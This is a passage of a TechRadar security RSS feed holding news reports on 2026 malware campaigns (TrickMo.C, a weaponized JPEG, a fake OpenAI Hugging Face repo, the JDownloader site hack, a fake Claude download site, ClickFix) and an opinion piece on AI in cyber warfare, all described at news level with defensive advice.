                                <ul><li><strong>ThreatFabric spotted new TrickMo.C variant targeting Android users in Europe</strong></li><li><strong>Disguised as TikTok/streaming apps, it steals credentials, intercepts SMS, suppresses OTPs, and enables live surveillance</strong></li><li><strong>Victims are mostly situated in France, Italy and Austria</strong></li></ul><p>Android users across Europe are being targeted with a new variant of a long-running banking trojan, researchers have revealed.</p><p>ThreatFabric has <a href="https://www.threatfabric.com/blogs/new-trickmo-variant-device-take-over-malware-targeting-banking-fintech-wallet-auth-app" target="_blank">explained</a> how it has been tracking a banking trojan called TrickMo.C since January 2026.</p><p>TrickMo is an Android banking trojan that was first spotted in September 2019 and has been in active development since, constantly receiving upgrades and new features. By 2024, there were more than 40 TrickMo variants in existence, delivered through more than a dozen droppers and communicating with 22 separate command-and-control (C2) infrastructures.</p><h2 id="extracting-secrets-from-the-french-italians-and-austrians">Extracting secrets from the French, Italians, and Austrians</h2><p>This latest version is disguised as TikTok and streaming apps. The exact distribution mechanism is unknown, but it is likely the crooks are advertising it on third-party app repositories, on Telegram and social media channels, and through phishing and SEO poisoning.</p><p>When installed on the target device, TrickMo.C creates a phishing overlay through which it harvests login credentials and other valuable secrets. It can also log keystrokes and taps, record the screen, livestream its contents directly to the attackers, and intercept SMS messages. 
It can suppress OTP notifications, modify the clipboard, filter notifications, and send screenshots.</p><p>All of this allows the attackers to steal credentials, log into victims' bank accounts and crypto wallets, and make payments and wire transfers while keeping the victims entirely in the dark. The victims are mostly located in France, Italy, and Austria, the report said. </p><p>What makes TrickMo.C stand out from previous versions is that it communicates with its operators via TON, a decentralized peer-to-peer network originally developed around the Telegram ecosystem. Instead of talking to publicly exposed C2 servers, the malware exchanges traffic with its operators through TON's encrypted overlay network, which leaves defenders no conventional server address to block. </p><p>The operators use ADNL (Abstract Datagram Network Layer) addresses, routed through an embedded local TON proxy that runs on the infected endpoint.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Experts warn of 'highly sophisticated' weaponized JPEG campaign used to send out ScreenConnect malware ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/experts-warn-of-highly-sophisticated-weaponized-jpeg-campaign-used-to-send-out-screenconnect-malware</link>
                                                                            <description>
                            <![CDATA[ Hackers are targeting enterprises with a weaponized JPEG file, establishing persistence and elevating privileges. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">SJP7XQrpdrD85kQVAm2ad5</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/x4SmwpYXk8yGgDmYCVeckL-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 12 May 2026 10:00:41 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/x4SmwpYXk8yGgDmYCVeckL-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A hand about to touch a phone. Superimposed on top of it is a pink triangle with exclamation mark inside it. Behind it is a computer display with code on it]]></media:description>                                                            <media:text><![CDATA[A hand about to touch a phone. Superimposed on top of it is a pink triangle with exclamation mark inside it. Behind it is a computer display with code on it]]></media:text>
                                <media:title type="plain"><![CDATA[A hand about to touch a phone. Superimposed on top of it is a pink triangle with exclamation mark inside it. Behind it is a computer display with code on it]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/x4SmwpYXk8yGgDmYCVeckL-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>Attackers weaponized a .jpeg file to deliver PowerShell payloads, trojanized ScreenConnect, and establish persistence</strong></li><li><strong>The malware enables credential theft, encrypted C2 comms, and surveillance features </strong></li><li><strong>Cyfirma warns the campaign reflects a mature intrusion framework</strong></li></ul><p>Be careful when downloading files from the internet, as even innocent .jpeg files can actually contain malware, experts have warned.</p><p>Security researchers Cyfirma <a href="https://www.cyfirma.com/research/operation-silentcanvas-jpeg-based-multistage-powershell-intrusion/" target="_blank" rel="nofollow">published</a> an in-depth report on a brand new hacking campaign they named “Operation SilentCanvas”. While we don’t know the number of infections, or successfully compromised victims, the researchers said the campaign likely targets enterprises and other organizations using remote administration tools.</p><p>The attack starts when the victim receives the weaponized .jpeg file. Again, we don’t know the exact delivery mechanism, but Cyfirma speculates the file is delivered either via phishing emails with malicious attachments, deceptive file-sharing interactions, or fake software and update lures. 
</p><h2 id="professionally-engineered-and-operationally-mature-intrusion-framework">"Professionally engineered and operationally mature intrusion framework"</h2><p>In any case, when the victim runs the file, named ‘sysupdate.jpeg’, it actually executes a malicious PowerShell payload which does a number of things: it downloads additional payloads from the attacker’s infrastructure; deploys a trojanized version of ConnectWise ScreenConnect for covert remote access; bypasses Windows security protections and elevates privileges by adding malicious Registry entries; and establishes persistence via a fake Windows service named OneDriveServers.</p><p>The <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a> also enables encrypted communications with the command-and-control (C2) infrastructure, steals credentials, and fingerprints the system. Other supported features include screen capture, microphone capture, and clipboard monitoring.</p><p>“The overall tradecraft reflects a professionally engineered and operationally mature intrusion framework capable of supporting long-term covert persistence, credential theft, lateral movement, enterprise espionage, and potential ransomware deployment within enterprise environments,” Cyfirma concluded, without naming the group, or even linking it to a specific country, or region.</p><p>To defend against this campaign, security experts should keep an eye on commonly abused Windows binaries, including csc.exe, cvtres.exe, or ComputerDefaults.exe. If possible, these should be blocked entirely. Remote access platforms should be strictly controlled, and detection rules for suspicious PowerShell behavior set up. </p><p>Finally, any system that displays unexpected ScreenConnect activity should be sealed off immediately. </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ A fake OpenAI repository has taken top spot on Hugging Face — but all it does is push infostealer malware ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/a-fake-openai-repository-has-taken-top-spot-on-hugging-face-but-all-it-does-is-push-infostealer-malware</link>
                                                                            <description>
                            <![CDATA[ Its popularity may have been faked, though, as the "likes" all came from auto-generated accounts. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">vPUYUUQayK4pMT6ZiaxU3S</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/PAztEScphfxGJfYno5NjrL-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 11 May 2026 15:05:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/PAztEScphfxGJfYno5NjrL-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A robot standing thoughtfully in front of a giant digital display with code on it]]></media:description>                                                            <media:text><![CDATA[A robot standing thoughtfully in front of a giant digital display with code on it]]></media:text>
                                <media:title type="plain"><![CDATA[A robot standing thoughtfully in front of a giant digital display with code on it]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/PAztEScphfxGJfYno5NjrL-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>Attackers typosquatted an OpenAI repo on HuggingFace, distributing an infostealer disguised as a “privacy filter” model</strong></li><li><strong>The malware disabled SSL checks, escalated privileges, and deployed the </strong><em><strong>sefirah</strong></em><strong> payload to steal credentials, crypto wallets, and system data</strong></li><li><strong>The fake repo hit 244,000 downloads and briefly topped HuggingFace rankings before removal, with other linked malicious repos also taken down</strong></li></ul><p>Cybercriminals were able to spoof OpenAI products to distribute infostealer malware to more than 240,000 computers before being spotted and eliminated, experts have warned.</p><p>Security researchers HiddenLayer said they spotted a new repository on HuggingFace called Open-OSS/privacy-filter.</p><p>The privacy filter repository is, according to HiddenLayer, a typosquatted version of the official release, which came with a model card that was copied “nearly verbatim”. The loader.py file that was shipped in it fetches and executes an infostealer, they added. </p><h2 id="rising-to-the-top">Rising to the top</h2><p>Before dropping the infostealer, the <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware </a>first disabled SSL verification, decoded a base64 URL, and from it downloaded a JSON payload with a PowerShell command. This command, in turn, downloaded a batch file that escalated privileges, deployed the ‘sefirah’ payload, added it to Microsoft Defender’s exclusion list, and then ran it. </p><p>The infostealer itself does what most infostealers do - grabs data saved in browsers, exfiltrates Discord tokens, local databases, and master keys, steals cryptocurrency wallet information, browser extension data, SSH, FTP, VPN credentials, as well as sensitive files stored locally. It can also grab screenshots, exfiltrate system information, and more. 
</p><p>The download count on the fake repository is massive - 244,000 downloads in mere days. </p><p>However, this doesn’t mean every download led to an infection. <a href="https://www.bleepingcomputer.com/news/security/fake-openai-repository-on-hugging-face-pushes-infostealer-malware/" target="_blank"><em>BleepingComputer</em></a> says the download numbers may have been inflated, and that the repository itself was “liked” by 667 auto-generated accounts. Still, even if it was all fake, the repository still managed to hit #1 on Hugging Face for a brief moment, which definitely could have led to infections. </p><p>However, by following the trail of the fake accounts, HiddenLayer was able to expose other, less-successful repositories, which were also malicious and used the same infrastructure. All of these have since been removed from the platform.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Top download manager JDownloader hacked — installers replaced with dangerous malware ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/top-download-manager-jdownloader-hacked-installers-replaced-with-dangerous-malware</link>
                                                                            <description>
                            <![CDATA[ Between May 6 and 7, it was dangerous to install JDownloader from alternative links on the site. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">4C3L2WBvp9imvne7zDKCEm</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/DVYr26EgcJb68CRrjxuAW4-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 11 May 2026 13:05:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/DVYr26EgcJb68CRrjxuAW4-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Hacker with malware code in computer screen. Cybersecurity, privacy or cyber attack. Programmer or fraud criminal writing virus software. Online firewall and privacy crime. Web data engineer]]></media:description>                                                            <media:text><![CDATA[Hacker with malware code in computer screen. Cybersecurity, privacy or cyber attack. Programmer or fraud criminal writing virus software. Online firewall and privacy crime. Web data engineer]]></media:text>
                                <media:title type="plain"><![CDATA[Hacker with malware code in computer screen. Cybersecurity, privacy or cyber attack. Programmer or fraud criminal writing virus software. Online firewall and privacy crime. Web data engineer]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/DVYr26EgcJb68CRrjxuAW4-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>Attackers exploited a CMS flaw to replace Windows and Linux installer links with malware‑laden versions between May 6–7, 2026</strong></li><li><strong>The poisoned installers deployed a Python‑based RAT via a loader, while other distribution channels (macOS, JAR, Snap, etc.) remained safe</strong></li><li><strong>AppWork advises verifying digital signatures (“AppWork GmbH”) to avoid tampered builds; the site has since been secured</strong></li></ul><p>Popular download manager JDownloader recently had its website hacked and hijacked to deploy malware to Windows and <a href="https://www.techradar.com/best/best-linux-distros-for-windows-users">Linux</a> users. </p><p>As explained by owner AppWork, unidentified attackers found a vulnerability in the website’s content management system (<a href="https://www.techradar.com/best/cms">CMS</a>), and used it to swap out the download links for a pair of variants:</p><p>"Changes were made through the website's content management system, affecting published pages and links," AppWork said in its incident report. "The attacker did not gain access to the underlying server stack — in particular no access to the host filesystem or broader operating-system-level control beyond CMS-managed web content."</p><h2 id="checking-the-digital-signature">Checking the digital signature</h2><p>Anyone who clicked on the alternative Windows installer download links, or the Linux shell installer link, between May 6 and May 7, 2026, was redirected to a third-party server hosting a malicious version of the software. This version was poisoned to include a loader that deployed a heavily obfuscated Python-built Remote Access Trojan (RAT). </p><p>Other downloads, including in-app updates, macOS downloads, Flatpak, Winget, Snap packages, and the main JDownloader JAR package were not tampered with, AppWork confirmed. 
</p><p>It also said the best way to make sure you’re using the right installer is to double-check its digital signature. That can be done by right-clicking on the executable, navigating to Properties, and then the Digital Signatures tab. The program needs to show it was signed by “AppWork GmbH”, otherwise it’s definitely <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a>. </p><p>On Reddit, users who downloaded the tainted versions saw the developer being listed as 'Zipline LLC,' and 'The Water Team'. Luckily enough, Windows Defender flagged the program as malicious, protecting the users.  </p><p>The website was temporarily turned off, allowing the company to plug the hole and clean up the links.</p><p><em>Via </em><a href="https://www.bleepingcomputer.com/news/security/jdownloader-site-hacked-to-replace-installers-with-python-rat-malware/" target="_blank"><em>BleepingComputer</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ 'Threat actors are clearly adapting to the widespread interest in popular AI tools': AI fans beware, hackers create a fake Claude site to spread backdoor malware ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/threat-actors-are-clearly-adapting-to-the-widespread-interest-in-popular-ai-tools-ai-fans-beware-hackers-create-a-fake-claude-site-to-spread-backdoor-malware</link>
                                                                            <description>
                            <![CDATA[ Sophos found a fake Claude website deploying a simple but effective RAT. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">qKnyW46inYpSrX2XYBAUAR</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/eVgzzXmQMEyvzfYvAaAMrX-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 08 May 2026 16:10:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/eVgzzXmQMEyvzfYvAaAMrX-1280-80.jpg">
                                                            <media:credit><![CDATA[wk1003mike / Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Trojan]]></media:description>                                                            <media:text><![CDATA[Trojan]]></media:text>
                                <media:title type="plain"><![CDATA[Trojan]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/eVgzzXmQMEyvzfYvAaAMrX-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>A spoofed site (</strong><em><strong>claude-pro[.]com</strong></em><strong>) delivers poisoned installers that sideload DonutLoader and the Beagle backdoor</strong></li><li><strong>The operation mimics legitimate Claude software, likely tied to PlugX operators using DLL sideloading</strong></li><li><strong>Researchers warn of malicious ads and SEO poisoning, urging users to verify links before downloading</strong></li></ul><p>If you’re looking to download the Claude client on Windows, be careful, because there are fake and malicious versions out there looking to exploit interest in new AI models.</p><p>Security researchers from Sophos have <a href="https://www.sophos.com/en-us/blog/donuts-and-beagles-fake-claude-site-spreads-backdoor" target="_blank">flagged</a> how one such alleged Claude Pro offering led them to a website “claude-pro[.]com”. The site itself was built to look identical to the legitimate claude.ai official website, but the researchers determined it was fake rather quickly, as none of the links or buttons on the site, aside from the download one, worked - all redirecting back to the homepage.</p><p>Those who didn’t spot the scam, and clicked the download button, would end up with a working version of Claude - however, one which had been poisoned to also deliver an updater, and a DLL file. In classic DLL sideloading fashion, the updater runs the malicious DLL which, in turn, deploys a loader malware called DonutLoader.</p><h2 id="dropping-beagle">Dropping Beagle</h2><p>This tool, in turn, fetched a “relatively simple backdoor” called Beagle, capable of running commands, uploading and downloading files, creating directories, uninstalling agents, and more. </p><p>Sophos could not attribute this campaign to any particular threat actor, but they did say that it was most likely operated by the same people who are running PlugX. 
</p><p>PlugX is a remote access trojan (RAT) usually used by Chinese state-linked threat groups to spy on victims, steal data, and maintain persistent access to compromised systems. The <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a> is described as being highly adaptable and modular, allowing attackers to execute commands, capture screenshots, log keystrokes, and move laterally across networks. It has been active for more than a decade and is one of the longer-running RATs out there. </p><p>The attackers most likely planned to run malicious ads and SEO poisoning to reach their targets, so make sure to double-check the links in your search engine before visiting any websites.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ AI-driven cyber warfare reshapes global defense readiness ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/ai-driven-cyber-warfare-reshapes-global-defense-readiness</link>
                                                                            <description>
                            <![CDATA[ The Iran conflict is exposing how AI is transforming cyber warfare, and testing global defenses in real time. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">32hgGRtr2V2P9HGAQta2DD</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/7DtE9RCVmUtmH2FAfvxsvM-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 08 May 2026 09:15:28 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Ziv Mador ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/7DtE9RCVmUtmH2FAfvxsvM-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:description>                                                            <media:text><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:text>
                                <media:title type="plain"><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/7DtE9RCVmUtmH2FAfvxsvM-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The Iran conflict is serving as an AI testbed for the next era of cyber conflict. Most organizations are watching the tactics and impact unfold with <a href="https://www.techradar.com/best/best-online-cyber-security-courses">cybersecurity</a> defenses that are simply not prepared for this level of sophistication. </p><p>Meanwhile, technology leaders are seeing AI as both their biggest opportunity and a major new attack vector. Despite this recognition of AI as both notable ally and foe, only one in five CIOs feels highly effective at defending against AI-enabled adversaries. </p><p>Concurrently, state-backed groups on all sides are already using AI-enhanced tooling to run highly targeted phishing attacks, moving quickly through networks and hitting critical <a href="https://www.techradar.com/best/best-infrastructure-management-service">IT infrastructure</a>.</p><p>Put simply, the AI-powered cyber arms race has moved beyond the theoretical and well into a live-testing phase, in a real conflict zone. </p><h2 id="cyber-as-the-first-mover">Cyber as the first mover</h2><p>Cyber operations are now an intrinsic part of warfare. US commanders have called cyber and space units the “first movers”, used to blind Iranian systems, cut communications, and shape the battlefield before and during airstrikes. </p><p>According to LevelBlue’s analysis, large <a href="https://www.techradar.com/news/best-ddos-protection">DDoS</a> attacks, deep hacks into energy and telecoms and manipulation of mobile apps drove Iran’s internet connectivity down to about 4% of normal during the first waves of strikes. It’s clear that cyber can no longer be thought of as a passive defense tactic.</p><p>The same dynamics can now be seen mirrored in Iran’s response. 
Iranian APTs (Advanced Persistent Threats) like MuddyWater, Charming Kitten, OilRig and Elfin have shifted from quiet pre-positioning to more aggressive cyberattack campaigns, using AI-assisted tooling like GhostFetch and RustyWater. </p><p>These <a href="https://www.techradar.com/best/best-ai-tools">AI tools</a> automate scouting, create convincing phishing lures and spread quickly through networks. Business leaders are learning in real time that in a crisis, cyber strikes hit first to blind, confuse decisions and set the scene for future attacks. </p><p>If their organization is unable to detect and respond to said strikes at machine-speed, they are already two steps behind.</p><h2 id="the-reality-of-ai-accelerated-attacks">The reality of AI-accelerated attacks</h2><p>The ongoing Iran conflict offers a concrete preview of how AI and cyber tactics will interact in future conflicts. War has moved off the battleground onto computer screens and lines of code. </p><p>On the offensive side, AI helps sift <a href="https://www.techradar.com/best/best-open-source-software">open-source</a> intelligence, satellite images and telemetry to spot targets faster. This is in line with what US officials have hinted at when talking about “finding and fixing” Iranian military assets.</p><p>On the defensive and retaliatory side, Iranian hackers and <a href="https://www.techradar.com/best/best-free-proxies">proxies</a> use AI for scale. This includes hyper-personalized phishing against policymakers and NGOs, automated credential theft and password spraying, in addition to wiper <a href="https://www.techradar.com/best/best-malware-removal">malware</a> hitting factories and hospitals to maximize chaos.</p><p>Such attacks are blurring the lines between “activists” and states. Groups using hacktivist-style names, like Handala, are carrying out destructive data-wiping and data-leaking operations that in reality look and feel like government-backed campaigns. 
However, whether it’s a lone hacker or a nation-state, the impact on a business is the same. </p><h2 id="what-it-leaders-need-to-know">What IT leaders need to know</h2><p>As the cyberthreat landscape grows in complexity and sophistication amid ongoing geopolitical conflict, CIOs, CTOs and business leaders in general need to take actionable steps to prepare: </p><p>Firstly, every business leader should assume that AI-driven tradecraft will be used against their organization, whether or not that business is a direct party to a geopolitical dispute. Threat <a href="https://www.techradar.com/best/best-bi-tools">intelligence</a> reports show spillover activity across sectors and regions as Iranian and allied groups probe for soft spots in energy, finance, healthcare and aviation networks beyond the conflict zone. </p><p>US medical-device company Stryker has already fallen victim to a state-backed cyberattack. Across the pond, the UK’s National Cyber Security Centre has also urged firms to strengthen their defenses amid the conflict. Therefore, the traditional “we’re not a likely target” thinking is rendered moot and dangerously outdated. </p><p>Secondly, investment in AI should be deliberate rather than reactive, to match attackers’ use of AI. Most leaders are now investing in AI for threat detection and faster response, while embedding cyber resilience across the business. The Iran conflict is actively demonstrating why this priority shift cannot wait. </p><p>Adversaries are using AI to sift through organizations' complex digital footprints, spotting tiny weaknesses or patterns that can be exploited, which lets them gain access to systems much faster than before. </p><p>On the defensive side, AI is already enriching analyst context. 
AI is being used to combine signals across <a href="https://www.techradar.com/news/best-domain-registrars">domains</a>, certificates, telemetry and intelligence sources to surface suspicious activity faster and with greater confidence. </p><p>However, clear governance is a must for the wider industry, as AI investments only pay off if someone is clearly in charge of them. In practice, this means boards actually understanding AI’s trade-offs, having a defined risk appetite, and clear cyber metrics that are tied directly to uptime, reputation and regulatory risk rather than just a dashboard of automated alerts. </p><p>Thirdly, the cyber-hygiene basics that AI will amplify need to be fixed and maintained. The Iran crisis has exposed how much damage can be done by exploiting long-standing weaknesses like unpatched remote access, flat networks and factory-set passwords on critical control equipment that were never changed. </p><p>With more than half of CIOs seeing software supply-chain <a href="https://www.techradar.com/news/best-internet-security-suites">security</a> and third-party distribution as high risk, 70% of them are investing in enhanced controls there. Enhanced controls in this context mean tightened due diligence on vendors and M&A targets. </p><p>They also mean demanding transparency into code provenance and build pipelines, in addition to using AI-assisted <a href="https://www.techradar.com/best/best-network-monitoring-tools">monitoring</a> to spot anomalies in partner behavior before an incident cascades into an organization's environment. </p><p>Finally, if a nation-scale disruption is to be expected (as it should be), it should be rehearsed for. Iran’s near-total connectivity blackout, combined with attacks on critical infrastructure communications, demonstrates the failure of “business-as-usual” assumptions. CIOs are increasingly planning to work with incident-response specialists and threat intelligence providers. 
</p><p>However, many still lack mature, tested continuity plans that assume prolonged outages, disinformation and simultaneous incidents across multiple suppliers. In an AI-driven crisis, businesses that have practiced decision-making under pressure, with partial data and automated attacks, will fare better than those still relying on a static playbook. </p><h2 id="final-thoughts">Final thoughts</h2><p>Most organizations around the globe are watching the events in Iran unfold with defenses designed for a slower, less sophisticated threat landscape. CIOs and IT leaders are learning in real time that when an attack occurs, there will not be a safe, quiet moment to prepare for it. </p><p>If adversaries are using AI to move faster, hide better and hit harder, businesses need to be equipped with governed AI capabilities, hardened basics and rehearsed crisis plans of their own. </p><p>Anything less amounts to hoping that the tactics being perfected over an active war zone will never be turned on your own business, which is simply not a strategy.</p><p><a href="https://www.techradar.com/best/best-patch-management-tools"><em>We've ranked the best patch management software</em></a><em>.</em></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ 'What started as someone potentially trying to remove the background from a selfie ended with a custom .NET stealer rifling through their browser passwords': Experts warn that free image editor tool could actually be dangerous malware ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/what-started-as-someone-potentially-trying-to-remove-the-background-from-a-selfie-ended-with-a-custom-net-stealer-rifling-through-their-browser-passwords-experts-warn-that-free-image-editor-tool-could-actually-be-dangerous-malware</link>
                                                                            <description>
                            <![CDATA[ Background removal services are being used in ClickFix attacks, delivering dangerous infostealer malware. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">7kqUCv8oGCyRACzhCd2cxi</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/jt92kXfBXVXUWwnKBmDJLn-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 07 May 2026 16:35:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/jt92kXfBXVXUWwnKBmDJLn-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:description>                                                            <media:text><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:text>
                                <media:title type="plain"><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/jt92kXfBXVXUWwnKBmDJLn-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>A fake photo tool ranked high in search results tricks users into running malware via ClickFix tactics</strong></li><li><strong>Victims first get infected with CastleLoader, which then deploys NetSupport RAT and a custom CastleStealer</strong></li><li><strong>The campaign highlights how SEO poisoning and social engineering can turn simple tasks into credential theft and remote compromise</strong></li></ul><p>A website promising to remove backgrounds from selfie photos is actually dropping infostealing malware on people’s computers, security researchers say.</p><p>Cybersecurity experts at Huntress <a href="https://www.huntress.com/blog/clickfix-castleloader-backgroundfix" target="_blank">outlined</a> how they discovered a website which, through SEO poisoning, worked its way to the top of search engine results pages. Therefore, when people search for background removal tools, there is a good chance they’ll land on this particular malicious site.</p><p>When they upload their photos to this service, the images are not actually processed. Nothing gets uploaded or shared in any way. However, the site then asks the user to “verify they’re human” by opening the Windows Run dialog and pasting a command that was copied onto their clipboard.</p><h2 id="castleloader-castlestealer-and-netsupport-rat">CastleLoader, CastleStealer, and NetSupport RAT</h2><p>In typical ClickFix fashion, the attackers get the victims to run the malware themselves, first infecting their devices with CastleLoader. 
This is the main loader used to deliver additional payloads.</p><p>Through CastleLoader, the miscreants can then deploy stage-two <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a>, including NetSupport RAT and CastleStealer.</p><p>The former is a remote access trojan (RAT) which grants the attackers remote access to infected systems, while the latter is a custom .NET stealer that targets browser credentials, crypto wallet data, Discord tokens, and Telegram session files. </p><p>“What started as someone potentially trying to remove the background from a selfie ended with a custom .NET stealer rifling through their browser passwords, crypto wallet vaults, and Telegram session, plus a NetSupport RAT dropped on disk for follow-up access,” Huntress explained. </p><p>ClickFix attacks can be mitigated through education: users should know that no legitimate service will ask them to verify they’re not a bot through on-device activity (such as running a program locally). Alternatively, admins can disable the Win + R shortcut for Run, making it less likely that victims will actually run the malicious code.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ North Korean hackers target gamers with trojanized platform - here's what to look out for ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/north-korean-hackers-target-gamers-with-trojanized-platform-heres-what-to-look-out-for</link>
                                                                            <description>
                            <![CDATA[ Popular game platform was compromised and used to deliver backdoors. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">H4d5VL85gNfqkdKWGBice9</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/eVgzzXmQMEyvzfYvAaAMrX-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 06 May 2026 22:20:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
